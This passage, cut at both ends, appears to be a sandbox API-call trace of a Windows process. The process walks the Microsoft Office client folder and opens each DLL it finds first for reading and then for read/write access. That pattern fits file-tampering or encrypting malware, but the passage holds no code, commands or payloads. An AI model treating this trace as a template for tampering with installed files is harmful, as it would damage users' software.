hHeap=0x20000) returned 1 [0099.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0099.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0099.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0099.587] AreFileApisANSI () returned 1 [0099.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client", lpUsedDefaultChar=0x0) returned 46 [0099.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.587] AreFileApisANSI () returned 1 [0099.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0099.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0099.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client") returned 46 [0099.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client" (normalized: "c:\\program files\\microsoft office\\root\\client"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.587] GetLastError () returned 0x5 [0099.587] GetLastError () returned 0x5 [0099.587] SetLastError (dwErrCode=0x5) [0099.587] GetLastError () returned 0x5 [0099.587] SetLastError (dwErrCode=0x5) [0099.587] GetLastError () returned 0x5 [0099.587] SetLastError (dwErrCode=0x5) [0099.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.588] AreFileApisANSI () returned 1 [0099.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0099.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0099.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client") returned 46 [0099.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client" (normalized: "c:\\program files\\microsoft office\\root\\client"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.588] GetLastError () returned 0x5 [0099.588] GetLastError () returned 0x5 [0099.588] SetLastError (dwErrCode=0x5) [0099.588] GetLastError () returned 0x5 [0099.588] SetLastError (dwErrCode=0x5) [0099.588] GetLastError () returned 0x5 [0099.588] SetLastError (dwErrCode=0x5) [0099.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0099.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0099.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0099.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0099.588] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0099.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0099.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0099.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.589] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x786d0 [0099.590] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2ca2e08, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2ca2e08, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.591] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0715cb9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0715cb9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0952017, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~1.DLL")) returned 1 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0099.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0099.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.593] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0099.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0099.593] AreFileApisANSI () returned 1 [0099.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 78 [0099.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.593] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.593] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.593] AreFileApisANSI () returned 1 [0099.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8cae8 [0099.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8cae8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 78 [0099.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.595] GetFileType (hFile=0x27c) returned 0x1 [0099.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0099.595] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.595] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.595] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.595] CloseHandle (hObject=0x27c) returned 1 [0099.596] AreFileApisANSI () returned 1 [0099.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8cd88 [0099.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 78 [0099.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.596] GetFileType (hFile=0x27c) returned 0x1 [0099.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.596] CloseHandle (hObject=0x27c) returned 1 [0099.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.597] AreFileApisANSI () returned 1 [0099.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8ced8 [0099.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8ced8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 78 [0099.597] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l1-2-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0715cb9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0715cb9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0952017, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.597] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0952017, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0952017, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0a832cb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="API-MS~3.DLL")) returned 1 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0099.598] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.598] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.598] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, 